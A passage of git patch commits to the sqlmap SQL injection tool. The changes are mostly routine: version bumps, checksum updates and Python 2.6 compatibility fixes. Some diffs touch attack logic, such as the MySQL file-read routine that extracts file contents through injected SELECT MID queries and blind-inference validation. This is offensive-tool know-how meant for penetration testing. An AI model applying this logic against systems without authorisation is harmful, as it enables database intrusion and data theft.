+3972e3e00115c6e4e03336e23e35b1de lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py @@ -100,12 +100,12 @@ c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py 918d6f34c415c578c2eae8730f555ae8 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py -a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py +8f2f246d17f5891a2e584533bd18e65c lib/utils/crawler.py 985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py -7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py +2384f77330583b53018a7dab5fc1c90f lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py -578007a75d75a2e510a9ec33f01eeeb0 lib/utils/hash.py +29dee8f54cfb39feb0545d237542f866 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py 010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py @@ -205,7 +205,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py 315a3ced9667065b24de040af296037a plugins/generic/databases.py b1bd764e8f417222ebb1890232290679 plugins/generic/entries.py -d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py +00e0b1b5713784c8131660bfc40bbaac plugins/generic/enumeration.py ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py From 0a8bc52910d7dbcda9c8ddca7e4bdf88ca83b8aa Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:13:08 +0100 Subject: [PATCH 018/428] Minor updates --- lib/core/option.py | 5 +++-- lib/core/settings.py | 2 +- lib/utils/api.py | 1 - plugins/dbms/mysql/filesystem.py | 9 ++++----- txt/checksum.md5 | 8 ++++---- 5 files changed, 12 insertions(+), 13 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 13b1103d4ef..ae27ae60aed 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1046,7 +1046,7 @@ def _setSocketPreConnect(): if conf.disablePrecon: return - def _(): + def _thread(): while kb.get("threadContinue") and not conf.get("disablePrecon"): try: for key in socket._ready: @@ -1078,6 +1078,7 @@ def connect(self, address): break else: try: + candidate.shutdown(socket.SHUT_RDWR) candidate.close() except socket.error: pass @@ -1090,7 +1091,7 @@ def connect(self, address): socket.socket._connect = socket.socket.connect socket.socket.connect = connect - thread = threading.Thread(target=_) + thread = threading.Thread(target=_thread) setDaemon(thread) thread.start() diff --git a/lib/core/settings.py b/lib/core/settings.py index e0b9fe0158c..e7c146c2015 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.21" +VERSION = "1.2.1.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 5aea6ae2b18..28f0a6c26f9 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -45,7 +45,6 @@ from lib.core.settings import RESTAPI_DEFAULT_PORT from lib.core.subprocessng import Popen from lib.parse.cmdline import cmdLineParser -from thirdparty.bottle.bottle import abort from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index cebeca56bf6..d28d1231283 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -68,14 +68,13 @@ def stackedReadFile(self, rFile): raise SqlmapNoneDataException(warnMsg) else: length = int(length) - sustrLen = 1024 + chunkSize = 1024 - if length > sustrLen: + if length > chunkSize: result = [] - for i in xrange(1, length, sustrLen): - chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - + for i in xrange(1, length, chunkSize): + chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) result.append(chunk) else: result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a9c50c7487b..1eb37c21c0b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -ac01954e9881b5ba6e41b85e6c08bd9a lib/core/option.py +598863f3b058650c17f465b16892dc67 lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4f27b5c4801cad5c6b8361f953a4f313 lib/core/settings.py +7fc35bef60750c8ba2475c154d7d481c lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -98,7 +98,7 @@ f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py -918d6f34c415c578c2eae8730f555ae8 lib/utils/api.py +e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 8f2f246d17f5891a2e584533bd18e65c lib/utils/crawler.py 985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py @@ -168,7 +168,7 @@ affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py b9e62a80bd3ead133a511f9769e5e6c3 plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -d6836e2a6a308eb3536e2e7fc74fdc8b plugins/dbms/mysql/filesystem.py +f36e09edc3eafedd989fbe44ec048e71 plugins/dbms/mysql/filesystem.py 2bfd2369aebe2999f7333cca0895507c plugins/dbms/mysql/fingerprint.py 88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py From 10fd004dece3a9ce37d09497deec5ba1b4cc042a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:24:28 +0100 Subject: [PATCH 019/428] Reverting set() brace form because of Python 2.6 compatibility issues --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- lib/takeover/web.py | 2 +- lib/utils/crawler.py | 2 +- lib/utils/har.py | 2 +- plugins/generic/enumeration.py | 6 +++--- sqlmap.py | 3 +++ txt/checksum.md5 | 14 +++++++------- 8 files changed, 18 insertions(+), 15 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a18daef0613..63d5f36cd31 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -770,7 +770,7 @@ def getManualDirectories(): checkFile(listPath) directories = getFileItems(listPath) elif choice == '4': - targets = {conf.hostname} + targets = set([conf.hostname]) _ = conf.hostname.split('.') if _[0] == "www": diff --git a/lib/core/settings.py b/lib/core/settings.py index e7c146c2015..6600deb9cad 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.22" +VERSION = "1.2.1.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 88df01687a3..2952a127f0b 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -205,7 +205,7 @@ def webInit(self): if readInput(message, default='Y', boolean=True): headers = {} - been = {conf.url} + been = set([conf.url]) for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 10ba77a4b58..6c844859474 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -126,7 +126,7 @@ def crawlThread(): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() - threadData.shared.unprocessed = {target} + threadData.shared.unprocessed = set([target]) if not conf.sitemapUrl: message = "do you want to check for the existence of " diff --git a/lib/utils/har.py b/lib/utils/har.py index 19fc7b67807..4def9b3db45 100644 --- a/lib/utils/har.py +++ b/lib/utils/har.py @@ -180,7 +180,7 @@ def toDict(self): "size": len(self.content or "") } - binary = {'\0', '\1'} + binary = set(['\0', '\1']) if any(c in binary for c in self.content): content["encoding"] = "base64" content["text"] = base64.b64encode(self.content) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 3983b6b30ca..0b6190ae473 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -60,13 +60,13 @@ def getBanner(self): bannerParser(kb.data.banner) if conf.os and conf.os == "windows": - kb.bannerFp["type"] = {"Windows"} + kb.bannerFp["type"] = set(["Windows"]) elif conf.os and conf.os == "linux": - kb.bannerFp["type"] = {"Linux"} + kb.bannerFp["type"] = set(["Linux"]) elif conf.os: - kb.bannerFp["type"] = {"%s%s" % (conf.os[0].upper(), conf.os[1:])} + kb.bannerFp["type"] = set(["%s%s" % (conf.os[0].upper(), conf.os[1:])]) if conf.os: setOs() diff --git a/sqlmap.py b/sqlmap.py index a0dcdb8329b..0c1e160f8fa 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -381,3 +381,6 @@ def main(): if __name__ == "__main__": main() +else: + # cancelling postponed imports (because of Travis CI checks) + from lib.controller.controller import start \ No newline at end of file diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1eb37c21c0b..c114b5544ce 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -e4fa4177b9d3c24555fb275335496e29 lib/core/common.py +27d1b0a4609eece643141408d1f18716 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7fc35bef60750c8ba2475c154d7d481c lib/core/settings.py +ee202f91d95b559f4cd9355f55203946 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -85,7 +85,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py 0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -3972e3e00115c6e4e03336e23e35b1de lib/takeover/web.py +1398cb4ee55becf628367854b5310f33 lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py @@ -100,10 +100,10 @@ c497003ecf231d03a311a816a6b3b753 lib/techniques/union/test.py 6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py -8f2f246d17f5891a2e584533bd18e65c lib/utils/crawler.py +a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py 985c737cd8a6a722160c55cf5ee224f4 lib/utils/deps.py a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py -2384f77330583b53018a7dab5fc1c90f lib/utils/har.py +7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py 9bd8fbfb9c25ee685c97b260331e7165 lib/utils/hashdb.py 29dee8f54cfb39feb0545d237542f866 lib/utils/hash.py 145120b21fcfca843d5e2c8b0562e4db lib/utils/htmlentities.py @@ -205,7 +205,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py 315a3ced9667065b24de040af296037a plugins/generic/databases.py b1bd764e8f417222ebb1890232290679 plugins/generic/entries.py -00e0b1b5713784c8131660bfc40bbaac plugins/generic/enumeration.py +d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py ea0f3b9085061b272bfd98c13ad2d977 plugins/generic/filesystem.py f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py 1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py @@ -224,7 +224,7 @@ c3cc8b7727161e64ab59f312c33b541a shell/stagers/stager.aspx_ 1f7f125f30e0e800beb21e2ebbab18e1 shell/stagers/stager.jsp_ 01e3505e796edf19aad6a996101c81c9 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -1bef42b51e59db28d04181955c405931 sqlmap.py +3e2e790c370442c3d98eaa88a3523b15 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py 4b1024cecb00f13a4e1be78391e9cedb tamper/appendnullbyte.py From be7711bcdb714df29101ebcb920ba322ed2697a1 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:29:53 +0100 Subject: [PATCH 020/428] Minor patch related to the #2900 --- lib/core/settings.py | 2 +- lib/techniques/blind/inference.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6600deb9cad..b390ec1f6ec 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.23" +VERSION = "1.2.1.24" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 4116d4d5e2f..61f92b6ef49 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -223,7 +223,7 @@ def validateChar(idx, value): result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) - if result and timeBasedCompare: + if result and timeBasedCompare and kb.injection.data[kb.technique].trueCode: result = threadData.lastCode == kb.injection.data[kb.technique].trueCode if not result: warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c114b5544ce..9f4377ab893 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ee202f91d95b559f4cd9355f55203946 lib/core/settings.py +b4bf9b1d887a7f992c1096132a0bec68 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -87,7 +87,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py 1398cb4ee55becf628367854b5310f33 lib/takeover/web.py d8c10f278e5943b137a222f4cedca59d lib/takeover/xp_cmdshell.py -f6844893afa7569052529e1c8d89bc35 lib/techniques/blind/inference.py +b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 855355a1a216f6b267a5f089028f1cd8 lib/techniques/dns/test.py From 9e75bb7f689b87f405531701d4eb8bee0adb2ed7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 11:43:17 +0100 Subject: [PATCH 021/428] Minor patch --- lib/controller/checks.py | 13 ++++++------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 10 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 7af2e01ea57..ff238e9783c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1461,11 +1461,11 @@ def checkNullConnection(): infoMsg = "testing NULL connection to the target URL" logger.info(infoMsg) - try: - pushValue(kb.pageCompress) - kb.pageCompress = False + pushValue(kb.pageCompress) + kb.pageCompress = False - page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD) + try: + page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False) if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}): kb.nullConnection = NULLCONNECTION.HEAD @@ -1489,9 +1489,8 @@ def checkNullConnection(): infoMsg = "NULL connection is supported with 'skip-read' method" logger.info(infoMsg) - except SqlmapConnectionException, ex: - errMsg = getSafeExString(ex) - raise SqlmapConnectionException(errMsg) + except SqlmapConnectionException: + pass finally: kb.pageCompress = popValue() diff --git a/lib/core/settings.py b/lib/core/settings.py index b390ec1f6ec..e844d0f6a11 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.24" +VERSION = "1.2.1.25" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9f4377ab893..f7416cc568d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -43cbf0f72f57279c6f65d531241e962c lib/controller/checks.py +a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py ccd66880fc677a3c83db2a3a70d196d7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b4bf9b1d887a7f992c1096132a0bec68 lib/core/settings.py +96752eb99f1d9a9f0562097d7557d5d3 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From aebfb7d5976815595067ef2e5afad094be83dbf0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Feb 2018 09:50:36 +0100 Subject: [PATCH 022/428] Update related to the #2912 --- lib/core/option.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index ae27ae60aed..b8d784cf59e 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -931,7 +931,7 @@ def _setTamperingFunctions(): try: module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) - except (ImportError, SyntaxError), ex: + except Exception, ex: raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex))) priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ diff --git a/lib/core/settings.py b/lib/core/settings.py index e844d0f6a11..3a84441b2f4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.25" +VERSION = "1.2.2.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f7416cc568d..574108ef97e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -40,13 +40,13 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 9eed2d4d370f375bda5e0c0488740e7f lib/core/optiondict.py -598863f3b058650c17f465b16892dc67 lib/core/option.py +02c846bf9fddbcb75afed72c0d6b9bdc lib/core/option.py 7dadbb9a301d40cc8cd9c7491e99b43d lib/core/profiling.py ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -96752eb99f1d9a9f0562097d7557d5d3 lib/core/settings.py +b7bba78cd084d423c170eef9a6f5dd1f lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From ef8b2d793f38d8251e7ea909545f2191f6e34b57 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Feb 2018 10:27:10 +0100 Subject: [PATCH 023/428] Fixes #2910 --- lib/core/common.py | 6 +++++- lib/core/enums.py | 9 +++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 18 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 63d5f36cd31..67631b110e1 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -75,6 +75,7 @@ from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import LOGGING_LEVELS from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import OPTION_TYPE from lib.core.enums import OS @@ -869,7 +870,10 @@ def boldifyMessage(message): def setColor(message, bold=False): retVal = message - level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_ for _ in dir(logging) if _ == _.upper()), message) or kb.get("stickyLevel") + level = extractRegexResult(r"\[(?P%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel") + + if isinstance(level, unicode): + level = unicodeencode(level) if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler if bold: diff --git a/lib/core/enums.py b/lib/core/enums.py index 849a6b314a1..7759986845f 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -22,6 +22,15 @@ class SORT_ORDER: FIFTH = 4 LAST = 100 +# Reference: https://docs.python.org/2/library/logging.html#logging-levels +class LOGGING_LEVELS: + NOTSET = 0 + DEBUG = 10 + INFO = 20 + WARNING = 30 + ERROR = 40 + CRITICAL = 50 + class DBMS: ACCESS = "Microsoft Access" DB2 = "IBM DB2" diff --git a/lib/core/settings.py b/lib/core/settings.py index 3a84441b2f4..f0c6367c41b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.0" +VERSION = "1.2.2.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 574108ef97e..f9cccc8c0e0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -27d1b0a4609eece643141408d1f18716 lib/core/common.py +17ab0324cb992a781cc197ec8c0209d7 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -35,7 +35,7 @@ e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 9458679feb9184f3fb1611daf1ebef63 lib/core/defaults.py a8bea09096a42a9a7feeb9d4d118ae66 lib/core/dicts.py 1a94690d60ed792ce441b6f2f4dbbef8 lib/core/dump.py -2ef745b04933855e049ba7fdc98f57b8 lib/core/enums.py +c8551f7696a76450e6d139409e4f06cd lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b7bba78cd084d423c170eef9a6f5dd1f lib/core/settings.py +67ea2aee17da22379743e5dc18159f3f lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From 62fc2e1e17347f911b02d636d50ef2e0b7db0037 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 6 Feb 2018 10:48:47 +0100 Subject: [PATCH 024/428] Fixes #2911 --- lib/core/dump.py | 11 ++++++----- lib/core/settings.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 8 deletions(-) diff --git a/lib/core/dump.py b/lib/core/dump.py index 7a7928dbe85..33f68e63d91 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -46,6 +46,7 @@ from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import UNICODE_ENCODING +from 